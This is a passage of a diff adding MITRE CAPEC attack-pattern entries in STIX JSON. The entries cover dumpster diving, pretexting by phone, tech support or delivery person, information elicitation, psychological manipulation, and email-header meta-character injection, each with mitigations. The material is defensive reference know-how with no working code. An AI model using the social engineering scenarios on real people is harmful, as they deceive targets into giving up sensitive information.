By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.", + "external_references": [ + { + "external_id": "CAPEC-406", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/406.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Dumpster Diving", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it.)" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "An adversary must have physical access to the dumpster or downstream processing facility." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary's interests. 
During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information.", + "external_references": [ + { + "external_id": "CAPEC-407", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/407.html" + }, + { + "description": "Gather Victim Identity Information", + "external_id": "T1589", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1589" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Depending on the adversary's intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. 
Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside." + ], + "x_capec_extended_description": "\n Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary’s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.", + "id": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-407-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bff09429-66bb-4bc2-90be-eb28271786e4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "target_ref": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. 
Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-408", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/408.html" + } + ], + "id": "attack-pattern--4b3c7a8c-f801-43d9-9ba7-1d0e2dc87e8b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-409", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html" + } + ], + "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. 
As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.", + "external_references": [ + { + "external_id": "CAPEC-41", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/41.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Meta-characters in E-mail Headers to Inject Malicious Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n To:From:Headerdef: whatever\n ", + "\n Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.\n Meta-characters like \\w \\s \\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Identify and characterize metacharacter-processing vulnerabilities in email headers: An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.

  2. Techniques
    Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.
    Manually tampering email headers to inject malicious metacharacter-based payload content in them.

Exploit

  1. An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.

  2. Techniques
    Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This attack targets most widely deployed feature rich email applications, including web based email programs." + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform validation on email header data", + "id": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc743c69-d4ac-4767-91af-c4ef9e82f50a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement email filtering solutions on mail server or on MTA, relay server.", + "id": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78fc3fe0-3e55-40a5-af05-614cea38688b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cba6ee4-dbac-4c77-8236-a6fcf7036196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. 
Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.", + "external_references": [ + { + "external_id": "CAPEC-410", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/410.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Information Elicitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". 
Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.", + "external_references": [ + { + "external_id": "CAPEC-412", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/412.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Customer Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social 
Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. 
However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.", + "external_references": [ + { + "external_id": "CAPEC-413", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/413.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Tech Support", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. 
Usually the hardest part is looking the part and having all of the proper credentials, papers and \"deliveries\" in order to be able to pull it off.", + "external_references": [ + { + "external_id": "CAPEC-414", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/414.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Delivery Person", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. 
Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.", + "external_references": [ + { + "external_id": "CAPEC-415", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/415.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Phone", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary's interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. 
Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary's speech and thought patterns.", + "external_references": [ + { + "external_id": "CAPEC-416", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/416.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Manipulate Human Behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + 
"attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--756dbec1-5182-44f6-a59e-093c4b3f451e", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "target_ref": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses social engineering to exploit the target's perception of the relationship between the adversary and themselves. 
This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-417", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/417.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + 
"attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "There are no necessary resources required for this attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.", + "id": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-417-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f1bc7a7-fc63-4847-b2bf-ad73c7d19b20", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + 